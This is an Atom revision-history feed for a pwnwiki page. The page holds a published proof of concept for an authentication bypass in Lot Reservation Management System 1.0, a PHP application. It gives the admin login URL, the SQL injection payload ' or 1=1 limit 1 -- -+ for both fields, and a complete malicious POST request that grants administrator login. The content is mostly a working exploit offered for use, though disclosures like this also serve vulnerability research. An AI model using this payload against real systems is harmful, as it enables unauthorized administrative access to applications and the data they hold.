<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Lot_Reservation_Management_System_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E</id>
	<title>Lot Reservation Management System 身份驗證繞過漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Lot_Reservation_Management_System_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Lot_Reservation_Management_System_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-20T23:47:14Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Lot_Reservation_Management_System_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;diff=1283&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #Exploit Title: lot reservation management system 1.0 - Authentication Bypass #Date: 2020-10-22 #Exploit Author: Ankita Pal #Vendor Homepage: https://www.sourcec...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Lot_Reservation_Management_System_%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&amp;diff=1283&amp;oldid=prev"/>
		<updated>2021-04-08T09:57:31Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #Exploit Title: lot reservation management system 1.0 - Authentication Bypass #Date: 2020-10-22 #Exploit Author: Ankita Pal #Vendor Homepage: https://www.sourcec...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#Exploit Title: lot reservation management system 1.0 - Authentication Bypass&lt;br /&gt;
#Date: 2020-10-22&lt;br /&gt;
#Exploit Author: Ankita Pal&lt;br /&gt;
#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html&lt;br /&gt;
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip&lt;br /&gt;
#Version: V1.0&lt;br /&gt;
#Tested on: Windows 10 + xampp v3.2.4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Proof of Concept:::&lt;br /&gt;
&lt;br /&gt;
Step 1:	Open the URL http://localhost:8081/lot-reservation-management-system/admin/login.php &lt;br /&gt;
&lt;br /&gt;
Step 2:	use payload ' or 1=1 limit 1 -- -+ for both username and password.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Malicious Request:::&lt;br /&gt;
&lt;br /&gt;
POST /lot-reservation-management-system/admin/ajax.php?action=login HTTP/1.1&lt;br /&gt;
Host: localhost:8081&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0&lt;br /&gt;
Accept: */*&lt;br /&gt;
Accept-Language: en-GB,en;q=0.5&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded; charset=UTF-8&lt;br /&gt;
X-Requested-With: XMLHttpRequest&lt;br /&gt;
Content-Length: 71&lt;br /&gt;
Origin: http://localhost:8081&lt;br /&gt;
Connection: close&lt;br /&gt;
Referer: http://localhost:8081/lot-reservation-management-system/admin/login.php&lt;br /&gt;
Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id&lt;br /&gt;
&lt;br /&gt;
username='+or+1%3D1+limit+1+--+-%2B&amp;amp;password='+or+1%3D1+limit+1+--+-%2B&lt;br /&gt;
&lt;br /&gt;
You will be login as admin of the application.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>